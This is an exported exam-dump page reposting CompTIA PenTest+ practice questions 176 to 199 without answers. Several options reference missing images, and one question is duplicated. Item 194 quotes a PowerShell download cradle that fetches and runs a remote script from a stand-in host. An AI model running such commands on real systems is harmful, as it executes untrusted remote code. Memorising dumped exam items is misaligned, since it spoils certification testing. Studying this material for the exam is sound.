This page was exported from Actual Test Materials [ http://blog.actualtests4sure.com ] Export date:Fri Nov 15 21:30:17 2024 / +0000 GMT ___________________________________________________ Title: CompTIA PT0-001 Premium Exam Engine pdf - Download Free Updated 295 Questions [Q176-Q199] --------------------------------------------------- CompTIA PT0-001 Premium Exam Engine pdf - Download Free Updated 295 Questions Verified PT0-001 Bundle Real Exam Dumps PDF NO.176 A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?  Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.  Identify the issues that can be remediated most quickly and address them first.  Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities  Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime. NO.177 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement.Which of the following is the MOST likely reason why the engagement may not be able to continue?  The consultant did not sign an NDA.  The consultant was not provided with the appropriate testing tools.  The company did not properly scope the project.  The initial findings were not communicated to senior leadership. NO.178 A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?A)B)C)D)  Option A  Option B  Option C  Option D NO.179 A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?  dsrm -users “DN=company.com; OU=hq CN=users”  dsuser -name -account -limit 3  dsquery user -inactive 3  dsquery -o -rdn -limit 21 NO.180 A file contains several hashes. Which of the following can be used in a pass-the-hash attack?  NTLMv2  Kerberos  NTLMv1  LMv2  NTLM NO.181 A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).  Convert to JAR.  Decompile.  Cross-compile the application.  Convert JAR files to DEX.  Re-sign the APK.  Attach to ADB. NO.182 Black box penetration testing strategy provides the tester with:  a target list  a network diagram  source code  privileged credentials Explanation/Reference:References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testingNO.183 An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials.  Elicitation attack  Impersonation attack  Spear phishing attack  Drive-by download attack Explanation/Reference: https://www.social-engineer.org/framework/influencing-others/elicitation/NO.184 Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)  The tester discovers personally identifiable data on the system  The system shows evidence of prior unauthorized compromise  The system shows a lack of hardening throughout  The system becomes unavailable following an attempted exploit  The tester discovers a finding on an out-of-scope system NO.185 A penetration tester is in the process of writing a report that outlines the overall level of risk to operations.In which of the following areas of the report should the penetration tester put this?  Appendices  Executive summary  Technical summary  Main body NO.186 Which of the following BEST describes why an MSA is helpful?  It contractually binds both parties to not disclose vulnerabilities.  It reduces potential for scope creep.  It clarifies the business arrangement by agreeing to specific terms.  It defines the timelines for the penetration test. NO.187 A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?  Manually run publicly available exploit code.  Confirm via evidence of the updated version number.  Run the vulnerability scanner again.  Perform dynamic analysis on the vulnerable service. NO.188 Which of the following BEST protects against a rainbow table attack?  Increased password complexity  Symmetric encryption  Cryptographic salting  Hardened OS configurations Explanation/Reference: https://www.sciencedirect.com/topics/computer-science/rainbow-tableNO.189 A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?  Openssl s_client -tls1_2 -connect 127.212.31.17:443  Openssl s_client -ss12 -connect 127.212.31.17:443  Openssl s_client -ss13 -connect 127.212.31.17:443  Openssl s_server -tls1_2 -connect 127.212.31.17:443 NO.190 A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?A)B)C)D)  Option A  Option B  Option C  Option D NO.191 After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?  Run a zero-day exploit.  Create a new domain user with a known password.  Modify a known boot time service to instantiate a call back.  Obtain cleartext credentials of the compromised user. NO.192 Which of the following exploits a vulnerability associated with IoT devices?  Blue snarfing  Simple certificate enrollment  Heartbleed  Mirai botnet NO.193 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?  The consultant did not sign an NDA.  The consultant was not provided with the appropriate testing tools.  The company did not properly scope the project.  The initial findings were not communicated to senior leadership. NO.194 Consider the following PowerShell command:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet Which of the following BEST describes the actions performed this command?  Set the execution policy  Execute a remote script  Run an encoded command  Instantiate an object NO.195 The following command is run on a Linux file system:Chmod 4111 /usr/bin/sudoWhich of the following issues may be exploited now?  Kernel vulnerabilities  Sticky bits  Unquoted service path  Misconfigured sudo NO.196 A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?  -p-  -p ALL  -p 1-65534  -port 1-65534 Explanation/Reference: https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hostsNO.197 A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:* Code review* Updates to firewall setting  Scope creep  Post-mortem review  Risk acceptance  Threat prevention NO.198 A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes.Which of the following is the BEST way to approach the project?  Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.  Review the firewall configuration, followed by a targeted attack by a read team.  Perform a discovery scan to identify changes in the network.  Focus on an objective-based approach to assess network assets with a red team. NO.199 A security consultant is trying to attack a device with a previously identified user account.Which of the following types of attacks is being executed?  Credential dump attack  DLL injection attack  Reverse shell attack  Pass the hash attack  Loading … Pass Your CompTIA Exam with PT0-001 Exam Dumps: https://www.actualtests4sure.com/PT0-001-test-questions.html --------------------------------------------------- Images: https://blog.actualtests4sure.com/wp-content/plugins/watu/loading.gif https://blog.actualtests4sure.com/wp-content/plugins/watu/loading.gif --------------------------------------------------- --------------------------------------------------- Post date: 2022-04-17 18:17:08 Post date GMT: 2022-04-17 18:17:08 Post modified date: 2022-04-17 18:17:08 Post modified date GMT: 2022-04-17 18:17:08